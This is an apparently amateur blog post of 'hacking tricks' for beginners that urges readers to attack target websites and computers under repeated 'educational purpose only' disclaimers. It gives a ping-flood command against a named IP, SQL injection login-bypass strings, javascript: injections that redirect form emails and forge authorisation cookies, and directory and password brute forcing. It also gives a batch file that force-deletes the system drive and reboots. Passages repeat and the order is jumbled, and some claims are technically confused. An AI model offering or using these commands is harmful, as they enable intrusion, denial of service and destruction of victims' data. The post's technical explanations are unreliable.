Well this blog is actually not very much usefull as i am not expert .... but still i tried a lot to collect information .... well these information is all for those who are newbie.. after every point you will get to know more good tricks ... hope u enjoy
NOTE: I TAKE NO RESPONSIBILITY IF YOU TRY TO THIS. THESE ALL THINGS ARE FOR EDUCATIONAL PURPOSE ONLY.....
Here are some actual hacking tricks which you can get these chance to do ....
at target URL you have to specify the site name where you are targeting.
Files with list here you have to browse and at front of you only you can take any file depends on situation and then START. It will search all links and show you everything in tree and in list.Then from there you can find administrative link and then use any brute force software to crack it or any means of attack as i showed above in this.
here we get that the ip address is 142.4.50.91 so next step is to execute the code of DDOS.
3. type this " ping site-ip -l 5120 -n 100000 -w 1"
what in this it will send these bytes a number of time and the server has to accept it if this same procedure is applied by many source then for sure that the site will lag and if lucky enough it can crash also.
Like this it will send again and again till then Request timed out.
Here you can add some LAN computer just follow some instruction and then right click on it and select your attack then it will automatically do everything and then boom .... it will show you the password right there.
NOTE: I TAKE NO RESPONSIBILITY IF YOU TRY TO THIS. THESE ALL THINGS ARE FOR EDUCATIONAL PURPOSE ONLY.....
Here are some actual hacking tricks which you can get these chance to do ....
1. Open source code and try to find all information you can get from website.
Some web developer are so idiot that they even try to put their password in their source code like i also once try to open source code of my school site and what i get all password of their Gmail account so i suggest to open first source code and get information as much as you can get it ....
2. In source code checking the value of password.
After opening the source code try to search the password. After that u will find one script try to see what's the value he is demanding. Before that you must have some little bit knowledge about HTML. In this image you will get it what i am saying :
Now here you can see the value that is password.php means if we try to type this value in the URL then it will show you the content of that password which server is demanding. What you have to do is to put this information at URL like
https://www.mysite/3/index.php/password.php
After this it will show the page and the password bu this you can access that .. well its really easy thing rarely you will find any situation just like that.
3.Changing the value of mail function which can send information to you email.
Sometimes in web site web developer gives one button which on pressing it sends all information to the email address and email address is specified in the source code so again you have to open the source code and again find the password text then near that you will find one value text as shown in image:
You can process by saving the site page and then open notepad or any editor and make change in the value of mail ... instead of xyz@gmail.com change them by your email address and then proceed it then it will send message to your mail id
NOTE: If their is no security script then it will surely works but if it will show error then its sure that there is somewhat high security which you have to crack it
if there is any security try to read the next point.
if there is any security try to read the next point.
4. Javascript injection by changing the value.
Its quite interesting thing .... in this a user can make his own script of java and you have to spoof the server by making some edit which is done by javascript injection.
To do this no software is required just a search engine like Google Chrome , Mozilla firefox etc.
First basics must be good and then later advance
These all things are usually typed in URL of ur search engine ... like
javascript:alert("hello world");
typing this in URL it will give alert and print hello world quite easy.
Now for changing the value like as in above chase changing mail to function sometimes it doesn't work so what we can do is javascript injection.like in this picture
Now just to change that mail id we can create one javascript. Take a look
javascript:alert(document.forms[0].to.value="shashank.sharma98@gmail.com");
now by putting this in URL it will first alert you by showing your email id that is shashank.sharma98@gmail.com and after that the first form value will be change.
In form 0 is consider as first and later .. so that's why i put 0 in bracket
So the value which was anonymous@gmail.com will be ignored and the javascript id will be executed.
These things can also be used for cookie editing.
A cookie, also known as an HTTP cookie, web cookie, or browser cookie, is a small piece of data sent from a website and stored in a user's web browser while the user is browsing that website
You can check is any website is using any cookie by using this javascript
javascript:alert(document.cookie);
Now after typing this it will show you all the names of cookies and those numbers.
To edit any cookie we use void(); command like
javascript:void(document.cookie="position= any value");
After replacing all this here is one example
javascript:void(document.cookie="Authorized=yes");
Now this will change the Authorized access to yes but it depends on various sites.
These were the tricks where you can edit , inject and cookie editing too by using javascript injecting.
5. Cryptography
Cryptography is the science of using maths to encrypt and decrypt data.It is used to make secure any data in insecure network so that it cannot be read by anyone except the receiver.
Here what happens the plain text is first encrypt by any means of trick or code by which plain text or cleartext convert into ciphertext which is the encrypted data and later it is decrypt by receiver by means of any key.A key is the number or phrase which is used to encrypt and decrypt.
so let us take an example.
ABCDEFGHIJKLMNOPQRSTUVWXYZ
and sliding everything up by 5 we get,
FGHIJKLMNOPQRSTUVWXYZABCDE
where F = A , G = B and H = C and goes on......
And here comes how we can crack password.
Well sometimes in source code we find the password value is somewhat D173@GH
To crack this our maths must be perfect .. so while entering the password you will get to find the encrpt words and decrypt words... you have to check every value and understand every sequence...
6. Brute forcing strong method to crack the password.
Strong method easy to use but time taking it depends on how much strong is the password is.
To use this method we need some software to proceed like Cain and Abel, Hashcat , Hydra.
Lets talk about hacking a site .... so first we need administrative page where you can login and get files so if you are lucky enough to get administrative page then its cool or download Dirbuster it brute force and searches every page it consist of deeply .... but take time so here how it looks like.
Lets talk about hacking a site .... so first we need administrative page where you can login and get files so if you are lucky enough to get administrative page then its cool or download Dirbuster it brute force and searches every page it consist of deeply .... but take time so here how it looks like.
at target URL you have to specify the site name where you are targeting.
Files with list here you have to browse and at front of you only you can take any file depends on situation and then START. It will search all links and show you everything in tree and in list.Then from there you can find administrative link and then use any brute force software to crack it or any means of attack as i showed above in this.
7. SQL injection (danjerous)
SQL injection is the technique where the user can inject some SQL statements in web page input.
It can easily crack the password and you can easily login in many website yeah if the security is not much upto the mark but this is my best thing i have ever had so at first start with we must know basic and then some codes.
THE THING WHICH I AM GOING TO DO IS MY OWN EXPERIMENT , ANY ILLEGAL ACTIVITY DONE BY THIS I AM NOT RESPONSIBLE THIS IS ONLY FOR EDUCATIONAL PURPOSE
Well first to do any hack thorugh in a website we must find the administrator page by DirBuster or some search in google.
1. In google type /admin.asp or /admin.aspx it will search all the words related to this and show all administrator pages. but to target any website you must use Dirbuster to get administrator page.
2. Find any website which you want to target. and get one the page where username and password options are there.
3. Next most important try to use SQL injection. Some codes are as follows
username- test' OR 1=1--
1 OR 1=1
1 AND 1=1
1\'1 and many more ........
4. Apply this in username and password like '=' or anything
5. And then boom it will access and can gain serious files but if you caught red handed then dont blame me.
NOTE: I am not sure that this will surely work but if the security is too high in these sites then please you need some more tricks to do that.
NOTE: I am not sure that this will surely work but if the security is too high in these sites then please you need some more tricks to do that.
8. DDOS attack.
What is DDOS? DDOS is Distributed Denial Of Service where hacker tries to send loads of bytes that server cant handle it. The incoming traffic flooding the victims originate from many different sources - potentially hundred or thousands or more which make impossible to stop and cant even block a single IP address. Its a very effective method can make even site crash and make it lag.
Some codes can be use to run this like:
1. Open cmd which is command prompt.
2. first get site ip address just simple type "ping sitename" and here you can get it. see in picture.
here we get that the ip address is 142.4.50.91 so next step is to execute the code of DDOS.
3. type this " ping site-ip -l 5120 -n 100000 -w 1"
what in this it will send these bytes a number of time and the server has to accept it if this same procedure is applied by many source then for sure that the site will lag and if lucky enough it can crash also.
Like this it will send again and again till then Request timed out.
9. Erase victims C:\ Drive forever.....
It can detect by anti virus if it is updated one but if you run this then its awesome....
If you try to run this on like in computer lab it won't be working because computer lab is connect in LAN so if you will erase the C:\ drive then it will be back again after restart so it will work on some places only if it is single computer the it will surely work....
The code is like this type it in notepad
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
and then save it as extension .bat
DON'T TRY TO RUN IT IN YOUR COMPUTER IT WILL SURELY DELETE YOUR C:\ IN JUST 10 OR 15 MINUTES.
10. Cain & Abel software hack.
Cain & Abel is a very good software you can easily hack the password of your LAN connected computer by using Brute force attack , Dictionary attack etc.
Like.This is how it looks like
